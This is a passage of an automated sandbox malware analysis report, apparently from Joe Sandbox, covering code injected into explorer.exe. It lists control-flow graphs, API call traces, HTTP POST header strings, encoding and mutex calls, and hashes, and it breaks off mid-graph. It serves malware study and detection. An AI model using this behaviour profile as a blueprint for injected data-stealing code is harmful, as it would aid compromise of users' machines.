                                                                                                                          • Opcode Fuzzy Hash: fd871161abbac29d783775026a1974c3ff0fd3080387ec1f78afb6c2fcff69e1
                                                                                                                          • Instruction Fuzzy Hash: E19150725753525FD715DE78CCC0AA1BBA4DB43220B1C06AAD4E2CB2E7E79458CDC7A0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 163 32029b7-32029c7 GetProcessHeap RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 032029C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1357844191-0
                                                                                                                          • Opcode ID: c22bc5fe2c3c3030bb7f736035f637ab7f3edd87cdbd189260036e1a9c2052ca
                                                                                                                          • Instruction ID: e74dbccabdffa68e3aeebfc0054ba802575dcf7eb527b069ccea9f217d762a00
                                                                                                                          • Opcode Fuzzy Hash: c22bc5fe2c3c3030bb7f736035f637ab7f3edd87cdbd189260036e1a9c2052ca
                                                                                                                          • Instruction Fuzzy Hash: F4A002B59512105BDD44B7B6BF0DA157529A744705F008544738585049996454088721

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 171 32020a7-3202102 call 3202415 call 32029b7 call 3202938 call 32024cc 180 3202104-320211b 171->180 181 320211d-3202129 171->181 184 320212d-320212f 180->184 181->184 185 3202403-3202412 call 3202999 184->185 186 3202135-320216c RtlZeroMemory 184->186 190 3202172-320218d 186->190 191 32023fb-3202402 186->191 192 32021bf-32021d1 190->192 193 320218f-32021a0 call 320243d 190->193 191->185 200 32021d5-32021d7 192->200 198 32021a2-32021b1 193->198 199 32021b3 193->199 201 32021b5-32021bd 198->201 199->201 202 32023e8-32023ee 200->202 203 32021dd-3202239 call 3202866 200->203 201->200 205 32023f0-32023f2 call 3202999 202->205 206 32023f7 202->206 211 32023e1 203->211 212 320223f-3202244 203->212 205->206 206->191 211->202 213 3202246-3202257 212->213 214 320225e-320228c call 32029b7 wsprintfW 212->214 213->214 217 32022a5-32022bc 214->217 218 320228e-3202290 214->218 223 32022fb-3202315 217->223 224 32022be-32022f4 call 32029b7 wsprintfW 217->224 219 3202291-3202294 218->219 220 3202296-320229b 219->220 221 320229f-32022a1 219->221 220->219 225 320229d 220->225 221->217 229 320231b-320232e 223->229 230 32023be-32023d4 call 3202999 223->230 224->223 225->217 229->230 234 3202334-320234a call 32029b7 229->234 237 32023d6-32023d8 call 3202999 230->237 238 32023dd 230->238 241 320234c-3202357 234->241 237->238 238->211 242 3202359-3202366 call 320297c 241->242 243 320236b-3202382 241->243 242->243 247 3202384 243->247 248 3202386-3202393 243->248 247->248 248->241 249 3202395-3202399 248->249 250 32023b3-32023ba call 3202999 249->250 251 320239b 249->251 250->230 252 320239b call 320296b 251->252 254 32023a0-32023ad RtlMoveMemory 252->254 254->250
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
                                                                                                                            • Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1
                                                                                                                            • Part of subcall function 03202938: lstrlen.KERNEL32(035170BE,?,00000000,00000000,032020E3,774C8A60,035170BE,00000000), ref: 03202940
                                                                                                                            • Part of subcall function 03202938: MultiByteToWideChar.KERNEL32(00000000,00000000,035170BE,00000001,00000000,00000000), ref: 03202952
                                                                                                                            • Part of subcall function 032024CC: RtlZeroMemory.NTDLL(?,00000018), ref: 032024DE
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000003C), ref: 0320213F
                                                                                                                          • wsprintfW.USER32 ref: 03202278
                                                                                                                          • wsprintfW.USER32 ref: 032022E3
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 032023AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                          • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                          • API String ID: 4204651544-1701262698
                                                                                                                          • Opcode ID: 5a5eb2af261c3e2777a2001d21d26342fefcbd72fc0d5bb9121479b3ba798328
                                                                                                                          • Instruction ID: bf338760b693de9c48f335df20d61b52cdf40c1426065803c7bfdbd9f2fc554a
                                                                                                                          • Opcode Fuzzy Hash: 5a5eb2af261c3e2777a2001d21d26342fefcbd72fc0d5bb9121479b3ba798328
                                                                                                                          • Instruction Fuzzy Hash: 76A18375618305EFD710DF68D888A2FBBE9EF88744F04482EF685D7292DB70D9488B52

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 256 3201ece-3201eec StrStrIA 257 3201ef5-3201f35 RtlMoveMemory * 2 StrStrIA 256->257 258 3201eee-3201ef0 256->258 260 3201fa7 257->260 261 3201f37-3201f48 StrStrIA 257->261 259 3201fab-3201fb3 258->259 262 3201fa9-3201faa 260->262 261->260 263 3201f4a-3201f5b StrStrIA 261->263 262->259 263->260 264 3201f5d-3201f68 lstrlen 263->264 265 3201fa3-3201fa5 264->265 266 3201f6a 264->266 265->262 267 3201f6c-3201f78 call 3201ffb 266->267 270 3201f7a-3201f80 267->270 271 3201f9b-3201fa1 lstrlen 267->271 272 3201f82-3201f85 270->272 273 3201f87-3201f8a 270->273 271->265 271->267 272->271 272->273 273->271 274 3201f8c-3201f8f 273->274 274->271 275 3201f91-3201f94 274->275 275->271 276 3201f96-3201f99 275->276 276->260 276->271
                                                                                                                          APIs
                                                                                                                          • StrStrIA.SHLWAPI(?,032031D8,00000000,03517460), ref: 03201EE4
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,00000000), ref: 03201F08
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,00000100), ref: 03201F22
                                                                                                                          • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 03201F31
                                                                                                                          • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 03201F44
                                                                                                                          • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 03201F57
                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 03201F64
                                                                                                                          • lstrlen.KERNEL32(?,?,?,00000000), ref: 03201F9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryMovelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 456560858-0
                                                                                                                          • Opcode ID: 01610372c196cad5fed2f01493cd42780e0e4a400465563cc91c0f04ce694a4c
                                                                                                                          • Instruction ID: b97d107f7cc7a5133baf460d224049b1440a5c5975eb803b964131194f8b281b
                                                                                                                          • Opcode Fuzzy Hash: 01610372c196cad5fed2f01493cd42780e0e4a400465563cc91c0f04ce694a4c
                                                                                                                          • Instruction Fuzzy Hash: 132128BA41430A69D730E964EC8DEFBB7DC9F45344F440926F680C3093D729F09D86A2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 292 3201e44-3201e59 293 3201ec8-3201ecd 292->293 294 3201e5b-3201e73 lstrlen CharLowerBuffA 292->294 297 3202671-320267d 293->297 295 3201e75-3201e7b 294->295 296 3201e9d-3201eaa call 32026fc 294->296 298 3201e7f-3201e89 lstrcmpiA 295->298 302 3201ec7 296->302 307 3201eac-3201eb5 call 3201ece 296->307 300 32026a9-32026ab 297->300 301 320267f-3202688 297->301 298->302 303 3201e8b-3201e9b 298->303 305 3202692-32026a8 lstrlen RtlMoveMemory 301->305 306 320268a-3202690 301->306 302->293 303->296 303->298 305->300 306->305 307->302 310 3201eb7-3201ec2 307->310 310->297
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,03201BF4), ref: 03201E5D
                                                                                                                          • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,03201BF4), ref: 03201E69
                                                                                                                          • lstrcmpiA.KERNEL32(?,03518404), ref: 03201E81
                                                                                                                          • lstrlen.KERNEL32(?,00000000), ref: 03202699
                                                                                                                          • RtlMoveMemory.NTDLL(03518404,?,00000000), ref: 032026A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2826435453-0
                                                                                                                          • Opcode ID: 6c2a8733dbe54ea837a82ef73de9d85e46dda8bd83e2308fbe2ec6acbbe6b107
                                                                                                                          • Instruction ID: ec181cdd8be5f321879a07e2b2ba406d19c5a065768b165ce03a3b9c46f5d650
                                                                                                                          • Opcode Fuzzy Hash: 6c2a8733dbe54ea837a82ef73de9d85e46dda8bd83e2308fbe2ec6acbbe6b107
                                                                                                                          • Instruction Fuzzy Hash: 18213BBAB113109FD700DF24FC889BEB79DEF89315B04442AE944CB282D771A84E87E1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 311 3201e3e-3201e59 312 3201ec8-3201ecd 311->312 313 3201e5b-3201e73 lstrlen CharLowerBuffA 311->313 316 3202671-320267d 312->316 314 3201e75-3201e7b 313->314 315 3201e9d-3201eaa call 32026fc 313->315 317 3201e7f-3201e89 lstrcmpiA 314->317 321 3201ec7 315->321 326 3201eac-3201eb5 call 3201ece 315->326 319 32026a9-32026ab 316->319 320 320267f-3202688 316->320 317->321 322 3201e8b-3201e9b 317->322 324 3202692-32026a8 lstrlen RtlMoveMemory 320->324 325 320268a-3202690 320->325 321->312 322->315 322->317 324->319 325->324 326->321 329 3201eb7-3201ec2 326->329 329->316
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,03201BF4), ref: 03201E5D
                                                                                                                          • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,03201BF4), ref: 03201E69
                                                                                                                          • lstrcmpiA.KERNEL32(?,03518404), ref: 03201E81
                                                                                                                          • lstrlen.KERNEL32(?,00000000), ref: 03202699
                                                                                                                          • RtlMoveMemory.NTDLL(03518404,?,00000000), ref: 032026A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2826435453-0
                                                                                                                          • Opcode ID: a7d4b919866049850c99b8924756beaa7973dcb558b1275bf84d4800f8e1768e
                                                                                                                          • Instruction ID: 027482479b1a35e3477de1789534a6a19c5da136ed7f3f1d91bfc3c7d0e3d60f
                                                                                                                          • Opcode Fuzzy Hash: a7d4b919866049850c99b8924756beaa7973dcb558b1275bf84d4800f8e1768e
                                                                                                                          • Instruction Fuzzy Hash: D6210B79A113119FD711DF24EC8897E77EDEF8A314B04446AE944DB282C771A84E87E1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 330 32018f4-3201917 CreateFileW 331 3201919-3201927 GetFileSize 330->331 332 320196d-320196f 330->332 333 3201965-320196c CloseHandle 331->333 334 3201929-320192b 331->334 333->332 334->333 335 320192d-3201949 call 32029b7 ReadFile 334->335 338 320194b-3201958 call 3201c39 call 3201972 335->338 339 320195d-3201964 call 3202999 335->339 338->339 339->333
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0320190C
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0320191C
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 03201966
                                                                                                                            • Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
                                                                                                                            • Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 03201941
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_21_2_3201000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2517252058-0
                                                                                                                          • Opcode ID: 833a2a12d92a6721d679635e30d2e6ce5232948d63a6c3c0a69439081d5a376d
                                                                                                                          • Instruction ID: cb15f3706b643696502776a2346e64460fc428e4449b2245e63e79ebb391fe6d
                                                                                                                          • Opcode Fuzzy Hash: 833a2a12d92a6721d679635e30d2e6ce5232948d63a6c3c0a69439081d5a376d
                                                                                                                          • Instruction Fuzzy Hash: 3B012B3A31131877D320FA75AC4CF6F755DCB827B4F014629B5D7A61C2DA60A85D4270

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:13.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:223
                                                                                                                          Total number of Limit Nodes:16
                                                                                                                          execution_graph 1345 2c23401 1346 2c23442 1345->1346 1347 2c2340a 1345->1347 1355 2c21274 VirtualQuery 1347->1355 1350 2c23416 RtlEnterCriticalSection 1357 2c23132 1350->1357 1356 2c2128b 1355->1356 1356->1346 1356->1350 1358 2c2314d 1357->1358 1371 2c232e8 1357->1371 1358->1371 1381 2c21000 GetProcessHeap RtlAllocateHeap 1358->1381 1360 2c231cd 1382 2c21000 GetProcessHeap RtlAllocateHeap 1360->1382 1362 2c23212 1363 2c232d8 1362->1363 1364 2c2322c lstrlen 1362->1364 1366 2c21011 3 API calls 1363->1366 1364->1363 1365 2c2323d 1364->1365 1383 2c21141 lstrlen lstrlen 1365->1383 1367 2c232df 1366->1367 1369 2c21011 3 API calls 1367->1369 1369->1371 1378 2c22f1f 1371->1378 1373 2c23260 1386 2c21000 GetProcessHeap RtlAllocateHeap 1373->1386 1375 2c2327f wsprintfA lstrcat 1387 2c21011 1375->1387 1377 2c232b8 lstrcat lstrlen RtlMoveMemory 1377->1363 1379 2c22f23 CreateThread CloseHandle 1378->1379 1380 2c22f3c RtlLeaveCriticalSection 1378->1380 1379->1380 1392 2c22ed2 1379->1392 1380->1346 1381->1360 1382->1362 1384 2c21162 1383->1384 1384->1363 1385 2c21000 GetProcessHeap RtlAllocateHeap 1384->1385 1385->1373 1386->1375 1388 2c21274 VirtualQuery 1387->1388 1389 2c21019 1388->1389 1390 2c2102d 1389->1390 1391 2c2101d GetProcessHeap HeapFree 1389->1391 1390->1377 1391->1390 1393 2c22f16 RtlExitUserThread 1392->1393 1394 2c22edd 1392->1394 1404 2c2178c lstrlen 1394->1404 1397 2c22f0e 1399 2c21011 3 API calls 1397->1399 1399->1393 1402 2c22f07 1403 2c21011 3 API calls 1402->1403 1403->1397 1405 2c217d3 1404->1405 1406 2c217a4 CryptBinaryToStringA 1404->1406 1405->1397 1410 2c21b1b 1405->1410 1406->1405 1407 2c217b7 1406->1407 1422 2c21000 GetProcessHeap RtlAllocateHeap 1407->1422 1409 2c217c2 CryptBinaryToStringA 1409->1405 1411 2c21b31 lstrlen 1410->1411 1412 2c21b3e 1410->1412 1411->1412 1423 2c21000 GetProcessHeap RtlAllocateHeap 1412->1423 1414 2c21b46 lstrcat 1415 2c21b82 1414->1415 1416 2c21b7b lstrcat 1414->1416 1424 2c2186c 1415->1424 1416->1415 1419 2c21011 3 API calls 1420 2c21ba5 1419->1420 1421 2c2105d VirtualFree 1420->1421 1421->1402 1422->1409 1423->1414 1447 2c21000 GetProcessHeap RtlAllocateHeap 1424->1447 1426 2c21890 1448 2c2106c lstrlen MultiByteToWideChar 1426->1448 1428 2c2189f 1449 2c217dc RtlZeroMemory 1428->1449 1431 2c218f1 RtlZeroMemory 1434 2c21926 1431->1434 1432 2c21011 3 API calls 1433 2c21b10 1432->1433 1433->1419 1435 2c21af3 1434->1435 1451 2c21000 GetProcessHeap RtlAllocateHeap 1434->1451 1435->1432 1437 2c219e2 wsprintfW 1439 2c21a02 1437->1439 1438 2c21add 1440 2c21011 3 API calls 1438->1440 1439->1438 1452 2c21000 GetProcessHeap RtlAllocateHeap 1439->1452 1440->1435 1442 2c21a70 1443 2c21ad6 1442->1443 1453 2c2104c VirtualAlloc 1442->1453 1445 2c21011 3 API calls 1443->1445 1445->1438 1446 2c21ac6 RtlMoveMemory 1446->1443 1447->1426 1448->1428 1450 2c217fe 1449->1450 1450->1431 1450->1435 1451->1437 1452->1442 1453->1446 1600 2c23371 1601 2c233b2 1600->1601 1602 2c2337a 1600->1602 1603 2c21274 VirtualQuery 1602->1603 1604 2c23382 1603->1604 1604->1601 1605 2c23386 RtlEnterCriticalSection 1604->1605 1606 2c23132 13 API calls 1605->1606 1607 2c233a3 1606->1607 1608 2c22f1f 22 API calls 1607->1608 1609 2c233aa RtlLeaveCriticalSection 1608->1609 1609->1601 1610 2c232f4 1612 2c23302 1610->1612 1611 2c2335f 1612->1611 1613 2c2332b RtlEnterCriticalSection 1612->1613 1614 2c23342 1613->1614 1619 2c2334e 1613->1619 1615 2c22faa 16 API calls 1614->1615 1617 2c23347 1615->1617 1616 2c23357 RtlLeaveCriticalSection 1616->1611 1618 2c22f1f 22 API calls 1617->1618 1618->1619 1619->1616 1454 2c22c8a 1462 2c22bf2 1454->1462 1456 2c22c9b 1457 2c22ca1 lstrlen 1456->1457 1458 2c22cc6 1456->1458 1467 2c22678 1457->1467 1482 2c2224c 1462->1482 1466 2c22c09 1466->1456 1468 2c22691 1467->1468 1474 2c22721 1467->1474 1469 2c21274 VirtualQuery 1468->1469 1468->1474 1470 2c226a7 1469->1470 1471 2c22753 1470->1471 1473 2c2279e 1470->1473 1470->1474 1476 2c226e9 1470->1476 1495 2c21000 GetProcessHeap RtlAllocateHeap 1471->1495 1477 2c227ad 1473->1477 1496 2c21000 GetProcessHeap RtlAllocateHeap 1473->1496 1481 2c2105d VirtualFree 1474->1481 1475 2c22768 memcpy 1475->1474 1479 2c22700 memcpy 1476->1479 1480 2c227c7 memcpy 1477->1480 1479->1474 1480->1474 1481->1458 1493 2c21000 GetProcessHeap RtlAllocateHeap 1482->1493 1484 2c22254 1485 2c223e3 1484->1485 1494 2c2104c VirtualAlloc 1485->1494 1487 2c22633 1487->1466 1488 2c225b5 lstrcat lstrcat lstrcat lstrcat 1490 2c223fc 1488->1490 1489 2c21011 GetProcessHeap HeapFree VirtualQuery 1489->1490 1490->1487 1490->1488 1490->1489 1491 2c22346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1490->1491 1492 2c2231f GetProcessHeap RtlAllocateHeap memcpy 1490->1492 1491->1490 1492->1490 1493->1484 1494->1490 1495->1475 1496->1480 1588 2c22c18 1590 2c22c2a 1588->1590 1589 2c22c82 1590->1589 1591 2c22bf2 11 API calls 1590->1591 1592 2c22c45 1591->1592 1592->1589 1593 2c21141 2 API calls 1592->1593 1594 2c22c59 1593->1594 1595 2c22c79 1594->1595 1596 2c22c5d lstrlen 1594->1596 1599 2c2105d VirtualFree 1595->1599 1597 2c22678 6 API calls 1596->1597 1597->1595 1599->1589 1497 2c23449 RtlEnterCriticalSection 1498 2c234ce 1497->1498 1500 2c2346e 1497->1500 1499 2c235bc RtlLeaveCriticalSection 1498->1499 1501 2c21274 VirtualQuery 1498->1501 1500->1498 1500->1499 1503 2c21274 VirtualQuery 1500->1503 1502 2c234e9 1501->1502 1502->1499 1505 2c234fd RtlZeroMemory 1502->1505 1529 2c235b1 1502->1529 1504 2c23485 1503->1504 1504->1498 1507 2c21274 VirtualQuery 1504->1507 1566 2c22f3d 1505->1566 1509 2c23494 1507->1509 1509->1498 1511 2c23498 lstrcat 1509->1511 1510 2c23526 StrToIntA 1510->1499 1512 2c2353b 1510->1512 1530 2c22faa 1511->1530 1514 2c21141 2 API calls 1512->1514 1516 2c23549 1514->1516 1516->1499 1519 2c23595 1516->1519 1520 2c23558 1516->1520 1517 2c22f1f 22 API calls 1518 2c234c3 1517->1518 1565 2c2105d VirtualFree 1518->1565 1522 2c22faa 16 API calls 1519->1522 1523 2c23574 1520->1523 1578 2c2105d VirtualFree 1520->1578 1525 2c235aa 1522->1525 1579 2c2104c VirtualAlloc 1523->1579 1528 2c22f1f 22 API calls 1525->1528 1527 2c23585 RtlMoveMemory 1527->1499 1528->1529 1529->1499 1531 2c21141 2 API calls 1530->1531 1532 2c22fbf 1531->1532 1533 2c22fd1 1532->1533 1534 2c21141 2 API calls 1532->1534 1550 2c23129 1533->1550 1580 2c21000 GetProcessHeap RtlAllocateHeap 1533->1580 1534->1533 1536 2c22fe6 1581 2c21000 GetProcessHeap RtlAllocateHeap 1536->1581 1538 2c22ff1 RtlZeroMemory 1539 2c22f3d 3 API calls 1538->1539 1540 2c23013 1539->1540 1541 2c23118 1540->1541 1542 2c2301e StrToIntA 1540->1542 1544 2c21011 3 API calls 1541->1544 1542->1541 1543 2c23038 1542->1543 1545 2c22f3d 3 API calls 1543->1545 1546 2c23120 1544->1546 1547 2c23047 1545->1547 1548 2c21011 3 API calls 1546->1548 1547->1541 1549 2c23051 lstrlen 1547->1549 1548->1550 1551 2c22f3d 3 API calls 1549->1551 1550->1517 1552 2c23066 1551->1552 1553 2c21141 2 API calls 1552->1553 1554 2c23074 1553->1554 1554->1541 1582 2c21000 GetProcessHeap RtlAllocateHeap 1554->1582 1556 2c2308b 1557 2c22f3d 3 API calls 1556->1557 1558 2c230a4 wsprintfA 1557->1558 1583 2c21000 GetProcessHeap RtlAllocateHeap 1558->1583 1560 2c230cc 1561 2c22f3d 3 API calls 1560->1561 1562 2c230dd lstrcat 1561->1562 1563 2c21011 3 API calls 1562->1563 1564 2c230ee lstrcat lstrlen RtlMoveMemory 1563->1564 1564->1541 1565->1498 1567 2c22f61 1566->1567 1568 2c22f4b 1566->1568 1570 2c21141 2 API calls 1567->1570 1569 2c21141 2 API calls 1568->1569 1575 2c22f57 1569->1575 1571 2c22f66 1570->1571 1572 2c22fa4 1571->1572 1573 2c21141 2 API calls 1571->1573 1572->1499 1572->1510 1573->1575 1574 2c21141 2 API calls 1576 2c22f8e 1574->1576 1575->1572 1575->1574 1576->1572 1577 2c22f92 RtlMoveMemory 1576->1577 1577->1572 1578->1523 1579->1527 1580->1536 1581->1538 1582->1556 1583->1560 1584 2c22cce 1586 2c22cd7 1584->1586 1585 2c22d02 1586->1585 1587 2c22678 6 API calls 1586->1587 1587->1585

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_02C28CC3 1 Function_02C216C7 2 Function_02C22CCE 80 Function_02C22678 2->80 3 Function_02C287CE 4 Function_02C22ED2 25 Function_02C2178C 4->25 64 Function_02C2105D 4->64 87 Function_02C21011 4->87 89 Function_02C21B1B 4->89 5 Function_02C21BD2 39 Function_02C21CA5 5->39 6 Function_02C213D7 7 Function_02C235D4 9 Function_02C214D8 7->9 66 Function_02C21363 7->66 82 Function_02C21000 7->82 7->87 8 Function_02C293D4 9->6 21 Function_02C213FE 9->21 9->82 9->87 10 Function_02C217DC 11 Function_02C223E3 36 Function_02C223A2 11->36 52 Function_02C22346 11->52 58 Function_02C2104C 11->58 11->87 93 Function_02C2231F 11->93 12 Function_02C23BE1 15 Function_02C21FE5 12->15 29 Function_02C21090 12->29 40 Function_02C212AA 12->40 42 Function_02C22EA8 12->42 51 Function_02C21141 12->51 68 Function_02C21261 12->68 78 Function_02C21274 12->78 12->82 84 Function_02C21305 12->84 94 Function_02C21320 12->94 96 Function_02C23829 12->96 101 Function_02C21235 12->101 13 Function_02C227E7 13->78 13->87 14 Function_02C21CE5 56 Function_02C21F4E 15->56 59 Function_02C21E4C 15->59 15->78 16 Function_02C295E5 17 Function_02C28EEF 18 Function_02C22BF2 18->11 60 Function_02C2224C 18->60 19 Function_02C232F4 41 Function_02C22FAA 19->41 92 Function_02C22F1F 19->92 20 Function_02C289F9 21->6 21->9 21->82 21->87 22 Function_02C21C82 22->14 23 Function_02C28B81 24 Function_02C22C8A 24->18 24->64 24->80 25->82 26 Function_02C23D8D 26->12 26->26 65 Function_02C23862 26->65 26->78 26->82 27 Function_02C2118D 28 Function_02C28F93 30 Function_02C22296 31 Function_02C22295 32 Function_02C22D9A 33 Function_02C25198 34 Function_02C28A9F 35 Function_02C2929C 37 Function_02C250A0 38 Function_02C236A1 38->9 38->66 38->82 38->87 39->14 41->51 41->82 41->87 103 Function_02C22F3D 41->103 90 Function_02C22E1B 42->90 43 Function_02C215A9 44 Function_02C21BAF 45 Function_02C228AD 45->51 46 Function_02C233B9 46->78 46->92 97 Function_02C23132 46->97 47 Function_02C215BE 47->43 47->47 47->82 47->87 48 Function_02C22643 49 Function_02C23840 50 Function_02C24140 52->30 52->82 52->87 53 Function_02C29844 54 Function_02C2104A 55 Function_02C23449 55->41 55->51 55->58 55->64 55->78 55->92 55->103 57 Function_02C2414F 60->82 61 Function_02C29955 62 Function_02C22659 63 Function_02C2285F 63->51 65->1 65->15 65->27 65->29 65->32 65->40 65->42 65->51 65->68 65->78 65->82 65->84 85 Function_02C21C08 65->85 65->87 65->94 65->96 65->101 102 Function_02C2133F 66->102 67 Function_02C29763 69 Function_02C24161 70 Function_02C21765 71 Function_02C2966A 72 Function_02C22B6E 72->13 72->25 72->64 72->72 79 Function_02C22974 72->79 72->87 72->89 73 Function_02C2106C 74 Function_02C2186C 74->10 74->29 74->58 74->73 74->82 74->87 75 Function_02C2926D 76 Function_02C23371 76->78 76->92 76->97 77 Function_02C28A71 79->45 79->51 79->58 79->63 79->64 79->70 79->82 79->87 80->78 80->82 81 Function_02C28702 83 Function_02C23401 83->78 83->92 83->97 85->5 85->22 85->44 85->58 86 Function_02C23709 86->47 86->66 86->82 86->87 87->78 88 Function_02C29814 89->74 89->82 89->87 90->82 90->87 91 Function_02C22C18 91->18 91->51 91->64 91->80 92->4 93->82 95 Function_02C29321 96->7 96->38 96->86 97->51 97->82 97->87 98 Function_02C25137 99 Function_02C28A37 100 Function_02C29337 103->51

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 2c23862-2c238de call 2c21000 GetModuleFileNameA call 2c21000 GetCurrentProcessId wsprintfA call 2c2118d CreateMutexA GetLastError 7 2c238e4-2c23940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 2c21000 Sleep lstrcmpiA 0->7 8 2c23bc5-2c23c3a call 2c21011 * 2 RtlExitUserThread call 2c21000 * 2 wsprintfA call 2c21235 0->8 13 2c23946-2c23961 GetCommandLineW CommandLineToArgvW 7->13 14 2c23a0a-2c23a14 lstrcmpiA 7->14 69 2c23c5e 8->69 70 2c23c3c-2c23c4c call 2c21141 8->70 16 2c23bc3-2c23bc4 13->16 17 2c23967-2c2398b call 2c216c7 GetModuleHandleA GetProcAddress 13->17 19 2c23b14-2c23b39 call 2c216c7 GetModuleHandleA GetProcAddress 14->19 20 2c23a1a-2c23a24 lstrcmpiA 14->20 16->8 33 2c2399e-2c239c0 GetModuleHandleA GetProcAddress 17->33 34 2c2398d-2c23999 call 2c21c08 17->34 35 2c23b3b-2c23b47 call 2c21c08 19->35 36 2c23b4c-2c23b59 GetModuleHandleA GetProcAddress 19->36 20->19 24 2c23a2a-2c23a40 lstrcmpiA 20->24 25 2c23a42-2c23a4e GetCommandLineA StrStrIA 24->25 26 2c23a67-2c23a71 lstrcmpiA 24->26 25->26 30 2c23a50 25->30 31 2c23a73-2c23a7f GetCommandLineA StrStrIA 26->31 32 2c23a88-2c23a92 lstrcmpiA 26->32 38 2c23a55-2c23a65 GetModuleHandleA 30->38 31->32 39 2c23a81-2c23a86 31->39 32->16 40 2c23a98-2c23aa4 GetCommandLineA StrStrIA 32->40 42 2c239c2-2c239d0 GetModuleHandleA GetProcAddress 33->42 43 2c239d6-2c239e8 